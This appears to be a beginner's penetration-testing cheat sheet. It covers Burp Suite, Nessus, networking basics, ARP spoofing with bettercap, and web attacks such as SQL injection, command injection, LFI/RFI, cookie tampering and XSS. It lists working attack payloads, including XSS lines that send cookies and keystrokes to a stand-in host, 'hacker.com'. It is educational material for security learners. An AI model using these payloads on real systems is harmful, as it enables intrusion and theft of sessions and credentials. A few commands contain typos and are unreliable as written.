- Extender - Similar to adding mods to a game like Minecraft, Extender allows us to add components such as tool integrations, additional scan definitions, and more!
- Scanner - Automated web vulnerability scanner that can highlight areas of the application for further manual investigation or possible exploitation with another section of Burp. This feature, while not in the community edition of Burp Suite, is still a key facet of performing a web application test.
- Requests will by default require our authorization to be sent.
- We can modify our requests in-line similar to what you might see in a man-in-the-middle attack and then send them on.
- We can also drop requests we don't want to be sent. This can be useful to see the request attempt after clicking a button or performing another action on the website.
- And last but not least, we can send these requests to other tools such as Repeater and Intruder for modification and manipulation to induce vulnerabilities
- URL Encode with Burp Suite:
Ctrl + U
to make a payload safe to send. - Intruder attack types:
- Sniper: Sends a single request to each selected item, typically used for targeted attacks. (e.g. a password bruteforce if we know the username)
- Battering ram: Sends multiple identical requests to selected items, ideal for brute force attacks.
- Pitchfork: Sends a combination of two payloads, one to the first item and another to the second item, useful for testing parameter-level vulnerabilities. (e.g. we know the username and password for a user)
- Cluster bomb: Sends multiple payloads to each selected item, useful for discovering new vulnerabilities. (tries every combination of values)
- Python modules can be installed from the BApp Store, by downloading Jython Jar file and placing it in the extender -> options -> python environment.
- Extensions can be created using the Burp Extender API with either Java, Python or Ruby.
Nessus is a GUI based vulnerability scanner
- Click here and register an account.
- Download the Nessus-#.##.#-debian6_amd64.deb file
- Navigate to the download and run the following command:
sudo dpkg -i package_file.deb
- Start the nessus service wit the command:
sudo /bin/systemctl start nessusd.service
- Open up Firefox and goto the following URL:
https://localhost:8834/
(Accept risk in case you get prompted) - Choose "Nessus Essentials" and click next. Skip when asked for a activation code
- Login with your account
- Wait for installation and then login again
Launch a scan = Hit the "New Scan"
Side menu option that allows us to create custom templates = Policies
Change plugin properties such as hiding them or changing their severity = Plugin rules
Wireshark is a tool used for creating and analyzing PCAPs (network packet capture files)
Since this section is very large, I've created an individual page for this, which can be found inside this repository by clicking here.
Nano is an easy to use command line text editor
^G
Display help text.
^O
Write the current file to disk
^X
Exit nano.
^T
Invoke spellcheck, if installed.
^Y
Next screen.
^V
Previous screen.
^L
Refresh (force redraw) current screen.
^J
Justify current paragraph. (Join together broken lines of text until double newline is encountered.)
^W
Search for a string or regular expression.
^\
Search and replace a string or regular expression
Vim is a free and open-source, screen-based and highly customizable text editor program for Unix
Generally speaking, there are three basic modes in Vim:
Command mode
– allows you to run commands (Default).
Insert mode
– allows you to insert/write text.
Visual mode
– visual text selector.
h
– move the cursor left
j
– cursor down
k
– cursor up
l
– move the cursor right
i
– enter the insert mode
esc
– enter the command mode
$
– move to the end of the line
yy
– copy a line
p
– paste
d
– delete a line
x
– cut a character
:q
– quit
:wq
– write & quit
:q!
– quit without saving
/word
– search for ‘word’ in the document
:vimgrep
– grep integration in Vim (allows to search in multiple files)
Find other very usefull commands here, or a full cheatsheet here.
This section will cover the basics of networking, such as IP addresses, ports, protocols, etc.
An IP address is a unique address that identifies a device on the internet or a local network. IP stands for "Internet Protocol," which is the set of rules governing the format of data sent via the internet or local network.
Example: 192.168.1.204
Reserved local IP addresses
192.168.1.0 = The network address
192.168.1.1 = The default getaway (router)
192.168.1.255 = The broadcast address
If you send something to the broadcast address, the message will be broadcasted to everybody else on the network.
IP addresses consists of 32 bits:
11000000.10101000.00000001.11001100 = 192.168.1.204
Or in hex
c0.a8.01.cc = 192.168.1.204
So a full IP address is made up by 8x4 bits(32-bits), where they are seperated by a dot after every 8 bits meaning there are 4 groups which is also called "octets".
Since an octet consists of 8 bits and there are 4 octets, a valid IP address can only be a number between 0 and 255, meaning it can be 256 different numbers:
(0-255).(0-255).(0-255).(0-255)
This makes the IP pool to have 2^32 = 4,294,967,296 different IP addresses that can be assigned.
A router assigns IP addresses to devices on a home network using a "pool" of addresses, ensuring no duplicates. This process, called dynamic IP assignment, uses the DHCP protocol.
When a device wants to connect outside the network, it communicates through the default gateway (the router), typically 192.168.1.1.
Class | Range | Subnet | Number of networks | Usage | For |
---|---|---|---|---|---|
A | 1.0.0.0 - 126.255.255.255 | 255.0.0.0 | 16,777,214 | Host Assigning | Big Companies and Government |
B | 128.0.0.0 - 191.255.20.0 | 255.255.0.0 | 65,534 | Host Assigning | Organizations |
C | 192.0.0.0 - 223.255.255.0 | 255.255.255.0 | 254 | Host Assigning | Networks with few hosts |
D | 224.0.0.0 - 239.255.255.255 | Special Purpose | Multicasting applications | ||
E | 240.0.0.0. - 255.255.255.255 | Special Purpose | Experimental(Illegal) |
Notes
- 127.0.0.0 is missing from the IP classes (16 million addresses) because they are loopback addresses on your local device. Normally used for network testing
- Class C gives us the the most networks and smaller hosts per network.
A subnet mask can look like this:
255.255.255.0
If there is a 255, then the corresponding octet in the IP address will stay the same, but if the number is 0, then that octet can anything in between 0-255. Example:
Subnet mask = 255.255.255.0
IP address = 192.168.1.204
The first 3 octets of the IP address 192.168.1.* will stay the same where the last octet "*" in our case is 204, which in fact is valid since the number can be anything in between 0-255
So the octets that never change is called the "Network portion" where the octet on a subnet mask zero is called the "Host".
IANA assigns IP addresses to a company. For example, IBM have the network range 9.0.0.0 which is a class A IP address. This gives the company the ability to slice up a network with another subnet mask, since the subnet mask for the Class A is only a default or a minimum they have to have. Example
IP = 9.1.4.0
Subnet mask = 255.255.255.0
= 256 other networks
The Class A network became a Classless network (when you cut up a network using a different subnet mask). Nowadays, we mainly do classles networks to take advantage of the IP addresses we need to use.
So in other words, big and massive networks can become into a smaller network.
Address Resolution Protocol (ARP) is a protocol or procedure that connects an ever-changing Internet Protocol (IP) address to a fixed physical machine address, also known as a media access control (MAC) address, in a local-area network (LAN)
So if the IP is known but the MAC adress is not, a request is broadcasted to every device on the network in order to match an IP address to its corresponding MAC address. This record is then maintained and saved to a table called ARP cache.
An ARP request contains the following information:
- The senders IP address.
- The senders MAC adress.
- The IP address we want to learn the MAC address for.
When a broadcast is made, a dynamic record is made. This can be made by typing the following command:
arp-scan -l -I <interface>
arp-scan
is a tool that can be used to scan for IP and MAC addresses on a local network. It can be installed with the command:sudo apt install arp-scan
sudo arp-scan -I eth0 -l
will send ARP queries for all valid IP addresses on the eth0 interface.
If we have the IP and MAC address values, a manual thus static record can be made. This is done with the command:
arp -s <IP_Address> <MAC_Address>
See all ARP entries with the command:
arp -a
Since it is possible to manually add entries to an ARP table, a few attack types can be made. These include:
- Inflating the ARP cache thus making it non-responsive
- Change the traffic on a network in order to listen for a traffic coming from a target. (MitM)
- Changing the traffic and completely stopping the traffic for a target device.
Flushing an ARP cache
This can be made with the following command:
arp -s -s neigh flush all
This command will delete every dynamic entry there is. The static ones will not be deleted since we added them manually. To remove the static entries run:
arp -d <IP_Address>
ARP spoofing is a type of MITM (man-in-the-middle attack) in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the linking of an attacker's MAC address with the IP address of a legitimate computer or server on the network.
ARP Spoofing with Bettercap
# Redirect flow
arpspoof -i <interface> -t <target_ip> <gateway_ip>
arpspoof -i <interface> -t <gateway_ip>
# Fool victim and gateway
echo 1 > /proc/sys/net/ipv4/ip_forward # Act as a router.
# Boot up bettercap
bettercap -iface <interface>
# Start ARP spoofing
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets <target_ip>
arp.spoof on
net.sniff on
# Bypass HTTPS by downgrading it to HTTP
# SSL strip, and needs change
set net.sniff.local true
set net.recon on
# HSTS bypass
hstshijack/hstshijack # Works for websites using HTTPS and not HSTS
This section will cover the basics of web exploitation.
Content discovery is divided into four parts, being manual, automated, OSINT and subdomain enumeration.
- Check the robots.txt file for disallowed/hiddenpages
- Check if there is /admin/ page
- Check if there is any pages (
~
and.bak
and.swp
- Check for git repositories /.git/. GitTools can be used in order to automatically scrape and download a git repository hosted online with a given URL.
- Check favicon to find the website frameworks (only works if the website developer doesn't replace this with a custom one)
Run this to find its md5 hash:
curl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico | md5sum
Check this database to find the framework. - Check the sitemap file for disallowed/hidden files
- Curl HTTP Headers to find potential information about the webserver software and possibly the programming/scripting language in use.
curl http://10.10.134.48 -v
The-v
switch enables verbose mode, which will output the headers - Look out for cookie values and change them if possible. Look after Base64 encoded values, JWT tokens, or maybe case folded values that can be used to bypass authentication with simply using casefold(). (Example: 'ß' -> 'ss')
- Test for Cross-site scripting
- Test with SQL injection methods
- Try Flask Template Injection (SSTI) with
{{config}}
in the url. If it works, try{{ get_user_file("/etc/passwd") }}
- Check
.htaccess
file for apache server configurations. - Grab banners/headers for framework, authentication and misconfiguration discovery
curl -IL https://www.inlanefreight.com
- Check the source code for any comments or hidden information in the inspector view.
When successfully finding a framework using on of the methods, Framework Stacking can be used afterwards where you check the framework documentation for potential admin portals etc.
What is Automated Discovery?
Automated discovery is the process of using tools to discover content rather than doing it manually. This process is automated as it usually contains hundreds, thousands or even millions of requests to a web server. These requests check whether a file or directory exists on a website, giving us access to resources we didn't previously know existed. This process is made possible by using a resource called wordlists.
What are wordlists?
Wordlists are just text files that contain a long list of commonly used words; they can cover many different use cases. For example, a password wordlist would include the most frequently used passwords, whereas we're looking for content in our case, so we'd require a list containing the most commonly used directory and file names.
Most common Automation tools
ffuf
, dirb
and gobuster
.
Example use for all three tools:
$ ffuf -w <wordlist>:FUZZ -u <IP>/FUZZ
$ dirb http://<IP>
$ gobuster dir -u http://<IP> -w <wordlist>
Google Hacking / Dorking
Google hacking / Dorking utilizes Google's advanced search engine features, which allow you to pick out custom content.
Filter | Example | Description |
---|---|---|
site | site:berkankutuk.dk | returns results only from the specified website address |
inurl | inurl:admin | returns results that have the specified word in the URL |
filetype | filetype:pdf | returns results which are a particular file extension |
intitle | intitle:admin | returns results that contain the specified word in the title |
Find many more operators here.
Wappalyzer
Wappalyzer is an online tool and browser extension that helps identify what technologies a website uses, such as frameworks, Content Management Systems (CMS), payment processors and much more, and it can even find version numbers as well. Read more here.
Wayback Machine
The Wayback Machine is a historical archive of websites that dates back to the late 90s. You can search a domain name, and it will show you all the times the service scraped the web page and saved the contents. This service can help uncover old pages that may still be active on the current website. Find the website here.
Email Harvesting
Email harvesting is the process of gathering email addresses from a website. This can be done manually by searching for email addresses in the source code of a website, or by using a tools such as Hunter.io and Phonebook. In order to verify the email addresses, you can use EmailHippo.
SSL/TLS Certificates
When a Certificate Authority (CA) issues an SSL/TLS certificate, it logs it in public Certificate Transparency (CT) logs. These logs can be searched for current and historical certificates on sites like crt.sh .
Search Engines
To search for subdomains of a domain:
-site:www.domain.com site:*.domain.com
DNS Bruteforce
Bruteforce DNS (Domain Name System) enumeration is the method of trying tens, hundreds, thousands or even millions of different possible subdomains from a pre-defined list of commonly used subdomains. For this method, the tool DNSrecon, Sublist3r or Turbolist3r can be used. A more modern but slower alternative is Amass.
It is usually also a good idea to probe for HTTP and HTTPS services on the discovered subdomains to filter out any false positives. This can be done with the tool httprobe.
Virtual Hosts
Some subdomains aren't always hosted in publically accessible DNS results, such as development versions of a web application or administration portals. Instead, the DNS record could be kept on a private DNS server or recorded on the developer's machines in their /etc/hosts
file (or c:\windows\system32\drivers\etc\hosts
file for Windows users) which maps domain names to IP addresses.
Because web servers can host multiple websites from one server when a website is requested from a client, the server knows which website the client wants from the Host header. We can utilise this host header by making changes to it and monitoring the response to see if we've discovered a new website.
Bruteforce by using the following command:
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: {domain}" -u http://{IP} -fs {size}
- Check for JWT tokens at JWT.io
- Flask cookies can be unsigned by using the following tool flask-unsign
- Flask cookies can be decoded/encoded using the following tool: Flask Session Cookie Decoder/Encoder. See example usage here
SQL (Structured Query Language) Injection occurs when user controlled input is passed to SQL queries without validation/sanitization. As a result, an attacker can pass in SQL queries to manipulate the outcome of such queries.
If an attacker is able to successfully pass input that is interpreted correctly, they would be able to do the following:
- Access, Modify and Delete information in a database when this input is passed into database queries. This would mean that an attacker can steal sensitive information such as personal details and credentials.
- Execute Arbitrary system commands on a server that would allow an attacker to gain access to users’ systems. This would enable them to steal sensitive data and carry out more attacks against infrastructure linked to the server on which the command is executed.
In-band SQLi (Classic SQLi)
In-band SQLi is the most common and easy-to-exploit of SQL injection attacks. In-band SQLi attacks rely on the fact that the same communication channel is used for both the attack and the result. There are two types of in-band SQLi attacks:
- Error-based SQLi - This type of SQL injection relies on error messages thrown by the database server to obtain information about the structure of the database. This information can then be used to formulate more attacks.
- Union-based SQLi - This type of SQL injection relies on using the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response.
Inferential SQLi (Blind SQLi)
Inferential SQLi is also known as blind SQL injection. As the name suggests, the vulnerability itself is not directly present in the application but can be inferred from the behaviour of the application. There are two types of inferential SQLi attacks being:
- Boolean-based SQLi - This type of SQL injection relies on sending SQL queries to the database which evaluate to either TRUE or FALSE. Depending on the result, the content within the HTTP response will change, or remain the same.
- Time-based SQLi - This type of SQL injection relies on sending SQL queries to the database which cause a time delay in the response. The time delay is used to infer if the result of the query is TRUE or FALSE.
See much more database and SQLi related information here.
sqlmap is a tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. See how to use it here.
'' OR 1=1 --'
' OR 1=1 --
1' OR 1=1 --
1' OR 1=1#
1' OR 1=1--
1' OR 1=1;--
1" or "1"="1"-- -
Command injection is the abuse of an application's behaviour to execute commands on the operating system, using the same privileges that the application on a device is running with.
A command injection vulnerability is also known as a "Remote Code Execution" (RCE) because an attacker can trick the application into executing a series of payloads that they provide, without direct access to the machine itself (i.e. an interactive shell). The webserver will process this code and execute it under the privileges and access controls of the user who is running that application.
This vulnerability exists because applications often use functions in programming languages such as PHP, Python and NodeJS to pass data to and to make system calls on the machine’s operating system. For example, taking input from a field and searching for an entry into a file.
Example of a vulnerable code in PHP:
<?php
$file = $_GET['file'];
$command = "cat $file";
system($command);
?>
Example of a vulnerable code in Python (Flask):
@app.route('/search')
def search():
query = request.args.get('query')
command = "grep -r " + query + " /var/www/html"
output = subprocess.check_output(command, shell=True)
return output
Command Injection can be detected in mostly one of two ways:
Method | Description |
---|---|
Blind | This type of injection is where there is no direct output from the application when testing payloads. You will have to investigate the behaviours of the application to determine whether or not your payload was successful. |
Verbose | This type of injection is where there is direct feedback from the application once you have tested a payload. For example, running the whoami command to see what user the application is running under. The web application will output the username on the page directly. |
Detecting Blind Command Injection:
Use time-delay payloads like ping
or sleep
to test for injection by observing response delays. Another method is redirecting output using >
(e.g., whoami > file
) and then reading the file with cat
.
The curl
command is a great way to test for command injection. This is because you are able to use curl to deliver data to and from an application in your payload.
curl http://vulnerable.app/process.php?search=The%20Beatles;whoami
Detecting Verbose Command Injection:
This is easier to detect since the output of commands like ping
or whoami
is displayed directly on the web application.
Applications that use user input to populate system commands with data can often be combined in unintended behaviour. For example, the shell operators ;
, &
and &&
will combine two (or more) system commands and execute them bot
Useful payloads for command injection (linux):
Payload | Description |
---|---|
whoami | See what user the application is running under. |
ls | List the contents of the current directory. You may be able to find files such as configuration files, environment files (tokens and application keys), and many more valuable things. |
ping | This command will invoke the application to hang. This will be useful in testing an application for blind command injection. |
sleep | This is another useful payload in testing an application for blind command injection, where the machine does not have ping installed. |
nc | Netcat can be used to spawn a reverse shell onto the vulnerable application. You can use this foothold to navigate around the target machine for other services, files, or potential means of escalating privileges. |
Useful payloads for command injection (windows):
Payload | Description |
---|---|
whoami | See what user the application is running under. |
dir | List the contents of the current directory. You may be able to find files such as configuration files, environment files (tokens and application keys), and many more valuable things. |
ping | This command will invoke the application to hang. This will be useful in testing an application for blind command injection. |
timeout | This command will also invoke the application to hang. It is also useful for testing an application for blind command injection if the ping command is not installed. |
Commands that quickly can be tested:
whoami
$(whoami)
| whoami
; whoami
' whoami
' || whoami
' & whoami
' && whoami
'; whoami
" whoami
" || whoami
" | whoami
" & whoami
" && whoami
"; whoami
$(`whoami`)
& whoami
&& whoami
When found cat /etc/os-release
can be used to find the OS version and other useful information.
A useful tool in Windows we can use to gain RCE is certutil.exe
(certutil.exe -urlcache -f <url> <filename>
). This command is a native Windows CLI program installed as part of Certificate Services. It's handy in engagements because it is a binary signed by Microsoft and allows us to make HTTP/s connections. In our scenario, we can use it to make an HTTP request to download a file from a web server that we control to confirm that the command was executed.
See this cheatsheet for more.
Command injection can be prevented in a variety of ways. Everything from minimal use of potentially dangerous functions or libraries in a programming language to filtering input without relying on a user’s input.
In PHP, many functions interact with the operating system to execute commands via shell; these include:
- Exec
- Passthru
- System
Snippet for a code that only accept and process numbers between 0-9 as input:
<input type="text" id="ping" name="ping" pattern="[0-9]+"</input>
<?php
echo passthru("/bin/ping -c 4 "$_GET["ping"]");
?>
Sanitising any input from a user that an application uses is a great way to prevent command injection. This is a process of specifying the formats or types of data that a user can submit. For example, an input field that only accepts numerical data or removes any special characters such as >
, &
and /
.
<?php
if (!filter_input (INPUT_GET, "number", FILTER_VALIDATE_NUMBER)) {
...
}
...
Read more about the function filter_input() here.
Applications will employ numerous techniques in filtering and sanitising data that is taken from a user's input. These filters will restrict you to specific payloads; however, we can abuse the logic behind an application to bypass these filters. For example, an application may strip out quotation marks; we can instead use the hexadecimal value of this to achieve the same result.
When executed, although the data given will be in a different format than what is expected, it can still be interpreted and will have the same result.
$payload = "\x2f|\x65 \x74 \x63\x2f\x70\x61 \x73 \x73 \x77\x64"
TO BE ADDED
These vulnerabilities can be some of the most critical as it often ends in leaks of customers personal data.
To find valid usernames, you can leverage error messages that reveal whether a username already exists. For example, using ffuf, you can automate testing with a wordlist of common usernames.
Example command:
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u <website_url> -mr "username already exists"
Options:
-w
: Specifies the wordlist path.-X
: Sets the request method (POST
in this case).-d
: Defines form data withFUZZ
placeholder for testing usernames.-H
: Adds headers (e.g.,Content-Type
).-u
: URL to send the request.-mr
: Looks for specific response text to confirm a valid username.
Brute force attacks try common passwords against usernames. After successful username enumeration, you can use the valid usernames for brute-forcing passwords.
Example command:
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u <website_url> -fc 200
Options:
-w
: Specifies multiple wordlists (e.g.,W1
for usernames,W2
for passwords).-X
: Sets the request method (POST
here).-d
: Defines form data withW1
for username andW2
for password.-H
: Adds headers (e.g.,Content-Type
).-fc
: Filters responses by excluding status code200
, indicating a failed login attempt.
Sometimes authentication processes contain logic flaws. A logic flaw is when the typical logical path of an application is either bypassed, circumvented or manipulated by a hacker.
This can be seen here:
if( url.substr(0,6) === '/admin') {
# Code to check user is an admin
} else {
# View Page
}
Because the above PHP code example uses three equals signs (===), it's looking for an exact match on the string, including the same letter casing. The code presents a logic flaw because an unauthenticated user requesting /adMin will not have their privileges checked and have the page displayed to them, totally bypassing the authentication checks.
Example:
A login process: that goes like step 1, 2, 3, 4 but the hacker make it go like 1, 4 which grants the hacker access to another users account.
Case:
Reset another users password and get the link for the reset process to your account. The design flaw here is that you can send a reset password request to support by passing a users name, and then entering your own email to get the link. This can be done by the following command:
curl '<url>/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&[email protected]'
Examining and editing the cookies set by the web server during your online session can have multiple outcomes, such as unauthenticated access, access to another user's account, or elevated privileges
The contents of some cookies can be in plain text, and it is obvious what they do. Take, for example, if these were the cookie set after a successful login:
Set-Cookie: logged_in=true; Max-Age=3600; Path=/
Set-Cookie: admin=false; Max-Age=3600; Path=/
Using this logic, if we were to change the contents of the cookies and make a request we'll be able to change our privileges.
For this, curl can be used by using:
curl -H "Cookie: logged_in=true; admin=true" <ip_address>/cookie-test
Hashed cookies
Sometimes cookie values can look like a long string of random characters; these are called hashes which are an irreversible representation of the original text. Here are some examples that you may come across:
Original String | Hash Method | Output |
---|---|---|
1 | md5 | c4ca4238a0b923820dcc509a6f75849b |
1 | sha-256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
1 | sha-512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
1 | sha1 | 356a192b7913b04c54574d18c28d46e6395428ab |
You can see from the above table that the hash output from the same input string can significantly differ depending on the hash method in use. Even though the hash is irreversible, the same output is produced every time
Encoded cookies
Encoding is similar to hashing in that it creates what would seem to be a random string of text, but in fact, the encoding is reversible
Take the below data as an example which is set by the web server upon logging in:
Set-Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==; Max-Age=3600; Path=/
This string base64 decoded has the value of {"id":1,"admin": false}
we can then encode this back to base64 encoded again but instead setting the admin value to true, which now gives us admin access.
Insecure Direct Object Reference(IDOR) is a type of access control vulnerability.
This type of vulnerability can occur when a web server receives user-supplied input to retrieve objects (files, data, documents), too much trust has been placed on the input data, and it is not validated on the server-side to confirm the requested object belongs to the user requesting it.
An example of this:
Imagine you've just signed up for an online service, and you want to change your profile information. The link you click on goes to http://shop.berkankutuk.dk/profile?user_id=1337
, and you can see your information.
Curiosity gets the better of you, and you try changing the user_id value to 420 instead (http://shop.berkankutuk.dk/profile?user_id=420
), and to your surprise, you can now see another user's information. You've now discovered an IDOR vulnerability!
In some scenarios, web applications are written to request access to files on a given system, including images, static text, and so on via parameters. Parameters are query parameter strings attached to the URL that could be used to retrieve data or perform actions based on user input. The following graph explains and breaking down the essential parts of the URL.
For example, if a user wants to access and display their CV within the web application, the request may look as follows, http://webapp.thm/get.php?file=userCV.pdf
, where the file
is the parameter and the userCV.pdf
, is the required file to access.
File inclusion vulnerabilities are commonly found and exploited in various programming languages for web applications, such as PHP that are poorly written and implemented. The main issue of these vulnerabilities is the input validation, in which the user inputs are not sanitized or validated, and the user controls them. When the input is not validated, the user can pass any input to the function, causing the vulnerability.
If the attacker somehow can write to the server such as /tmp
directory, then it is possible to gain remote command execution RCE. However, it won't be effective if file inclusion vulnerability is found with no access to sensitive data and no writing ability to the server.
Also known as Directory traversal, a web security vulnerability allows an attacker to read operating system resources, such as local files on the server running an application. The attacker exploits this vulnerability by manipulating and abusing the web application's URL to locate and access files or directories stored outside the application's root directory.
An example of this can be seen by running this command on a website with this vulnerability:
http://webapp.thm/get.php?file=../../../../etc/passwd
The result would look like this:
Another vulnerable code example in PHP:
<?PHP
include($_GET["file"]);
?>
Similarly, if the web application runs on a Windows server, the attacker needs to provide Windows paths
You can find a list of common OS files here
Most of the time in CTF's the path you are looking for would be: ../../../../etc/passwd
If a path is placing .php
at the end of your search, then this tells us that the developer specifies the file type to pass to the include function. To bypass this scenario, we can use the NULL BYTE, which is %00
.
Using null bytes is an injection technique where URL-encoded representation such as %00
or 0x00
in hex with user-supplied data to terminate strings. You could think of it as trying to trick the web app into disregarding whatever comes after the Null Byte.:
/etc/passwd%00
NOTE: the %00
trick is fixed and not working with PHP 5.3.4 and above.
Though this can be filtered by the developer. But we can also bypass that by trying the "current directory" trick which looks something like this:
/etc/passwd/.
If the developer uses input validation by filtering some keywords, ex. "../", we can bypass this by using:
....//....//....//....//....//etc/passwd
This works because the PHP filter only matches and replaces the first subset string ../
it finds and doesn't do another pass, leaving:
../../../../etc/passwd
If the developer forces you to include a directory, you can bypass this by writing the directory and then moving up from there. Ex. if the forced directory is 'language':
languages/../../../../../etc/passwd
Remote File Inclusion (RFI) is a technique to include remote files and into a vulnerable application. Like LFI, the RFI occurs when improperly sanitizing user input, allowing an attacker to inject an external URL into include
function. One requirement for RFI is that the allow_url_fopen
option needs to be on
.
The risk of RFI is higher than LFI since RFI vulnerabilities allow an attacker to gain Remote Command Execution (RCE) on the server. Other consequences of a successful RFI attack include:
- Sensitive Information Disclosure
- Cross-site Scripting (XSS)
- Denial of Service (DoS)
An external server must communicate with the application server for a successful RFI attack where the attacker hosts malicious files on their server. Then the malicious file is injected into the include function via HTTP requests, and the content of the malicious file executes on the vulnerable application server.
How to
- Create a file somewhere on your local computer. ex "cmd.txt"
- Open the file and write some code inside it
- Now create a webserver using python by running:
python3 http.server <port>
in the same path of the file. - Now open the browser and enter the http address where you want the attack to direct. This could look like this:
http://10.10.135.181:9001/cmd.txt
As a developer, it's important to be aware of web application vulnerabilities, how to find them, and prevention methods. To prevent the file inclusion vulnerabilities, some common suggestions include:
- Keep system and services, including web application frameworks, updated with the latest version.
- Turn off PHP errors to avoid leaking the path of the application and other potentially revealing information.
- A Web Application Firewall (WAF) is a good option to help mitigate web application attacks.
- Disable some PHP features that cause file inclusion vulnerabilities if your web app doesn't need them, such as allow_url_fopen on and allow_url_include.
- Carefully analyze the web application and allow only protocols and PHP wrappers that are in need.
- Never trust user input, and make sure to implement proper input validation against file inclusion.
- Implement whitelisting for file names and locations as well as blacklisting.
PHP filters are used to validate and sanitize external input. The filter extension provides a way to validate and sanitize external inputs. The filter extension is not enabled by default, so you need to enable it in the php.ini file.
Filters can be used by using php://filter
. For example, to base64 encode a file, you can use:
php://filter/convert.base64-encode/resource=index.php
TO BE ADDED
Cross-Site Scripting, better known as XSS in the cybersecurity community, is classified as an injection attack where malicious JavaScript gets injected into a web application with the intention of being executed by other users
Cross-site scripting vulnerabilities are extremely common
DOM stands for Document Object Model and is a programming interface for HTML and XML documents. It represents the page so that programs can change the document structure, style and content. A web page is a document, and this document can be either displayed in the browser window or as the HTML source
This is when an attack payload is executed by manipulating the DOM (Document Object Model) in the target's browser. This type uses the client-side code instead of server-side code.
Exploiting the DOM
DOM Based XSS is where the JavaScript execution happens directly in the browser without any new pages being loaded or data submitted to backend code. Execution occurs when the website JavaScript code acts on input or user interaction.
Example Scenario:
The website's JavaScript gets the contents from the window.location.hash
parameter and then writes that onto the page in the currently being viewed section. The contents of the hash aren't checked for malicious code, allowing an attacker to inject JavaScript of their choosing onto the webpage.
Potential Impact: Crafted links could be sent to potential victims, redirecting them to another website or steal content from the page or the user's session.
How to test for Dom Based XSS:
DOM Based XSS can be challenging to test for and requires a certain amount of knowledge of JavaScript to read the source code. You'd need to look for parts of the code that access certain variables that an attacker can have control over, such as "window.location.x
" parameters.
When you've found those bits of code, you'd then need to see how they are handled and whether the values are ever written to the web page's DOM or passed to unsafe JavaScript methods such as eval()
This is when a malicious script bounces off another website onto the target's web application or website. Normally, these are passed in the URL as a query, and it's easy as making the target click a link. This type originates from the target's request.
Or in other words, reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without any validation.
Example Scenario:
A website where if you enter incorrect input, an error message is displayed. The content of the error message gets taken from the error parameter in the query string and is built directly into the page source.
How to test for Reflected XSS
You'll need to test every possible point of entry; these include:
- Parameters in the URL Query String
- URL File Path
- Sometimes HTTP Headers (although unlikely exploitable in practice)
A small test to see if a reflected XSS is possible is to enter a single quote ('
) into the input field and see if the page breaks or shows an error message. If it does, then it's likely exploitable.
Another way to test for reflected XSS is to enter the following payload into the input field:
"><script>alert("exploitable")</script>
If the page shows an alert box saying "exploitable", then it's likely exploitable.
As the name infers, the XSS payload is stored on the web application (in a database, for example) and then gets run when other users visit the site or web page.
Example Scenario:
A blog website that allows users to post comments. Unfortunately, these comments aren't checked for whether they contain JavaScript or filter out any malicious code. If we now post a comment containing JavaScript, this will be stored in the database, and every other user now visiting the article will have the JavaScript run in their browser.
How to test for Stored XSS:
You'll need to test every possible point of entry where it seems data is stored and then shown back in areas that other users have access to; a small example of these could be:
- Comments on a blog
- User profile information
- Website Listings
Blind XSS is similar to a stored XSS (which we covered in task 4) in that your payload gets stored on the website for another user to view, but in this instance, you can't see the payload working or be able to test it against yourself first.
Example Scenario: A website has a contact form where you can message a member of staff. The message content doesn't get checked for any malicious code, which allows the attacker to enter anything they wish. These messages then get turned into support tickets which staff view on a private web portal.
Potential Impact: Using the correct payload, the attacker's JavaScript could make calls back to an attacker's website, revealing the staff portal URL, the staff member's cookies, and even the contents of the portal page that is being viewed. Now the attacker could potentially hijack the staff member's session and have access to the private portal.
How to test for Blind XSS: When testing for Blind XSS vulnerabilities, you need to ensure your payload has a call back (usually an HTTP request). This way, you know if and when your code is being executed.
A popular tool for Blind XSS attacks is xsshunter. Although it's possible to make your own tool in JavaScript, this tool will automatically capture cookies, URLs, page contents and more.
In XSS, the payload is the JavaScript code we wish to be executed on the targets computer. There are two parts to the payload, the intention and the modification.
The intention is what you wish the JavaScript to actually do, and the modification is the changes to the code we need to make it execute as every scenario is different.
Proof Of Concept:
This is the simplest of payloads where all you want to do is demonstrate that you can achieve XSS on a website. This is often done by causing an alert box to pop up on the page with a string of text, for example:
<script>alert('XSS');</script>
Session Stealing:
Details of a user's session, such as login tokens, are often kept in cookies on the targets machine. The below JavaScript takes the target's cookie, base64 encodes the cookie to ensure successful transmission and then posts it to a website under the hacker's control to be logged. Once the hacker has these cookies, they can take over the target's session and be logged as that user.
<script>fetch('https://hacker.com/steal?cookie=' + btoa(document.cookie));</script>
Key Logger:
The below code acts as a key logger. This means anything you type on the webpage will be forwarded to a website under the hacker's control. This could be very damaging if the website the payload was installed on accepted user logins or credit card details.
<script>document.onkeypress = function(e) { fetch('https://hacker.com/log?key=' + btoa(e.key) );}</script>
Business Logic:
This payload is a lot more specific than the above examples. This would be about calling a particular network resource or a JavaScript function. For example, imagine a JavaScript function for changing the user's email address called user.changeEmail(). Your payload could look like this:
<script>user.changeEmail('[email protected]');</script>
An XSS polyglot is a string of text which can escape attributes, tags and bypass filters all in one.
This command will print "BERKAN_WAS_HERE" on the screen.
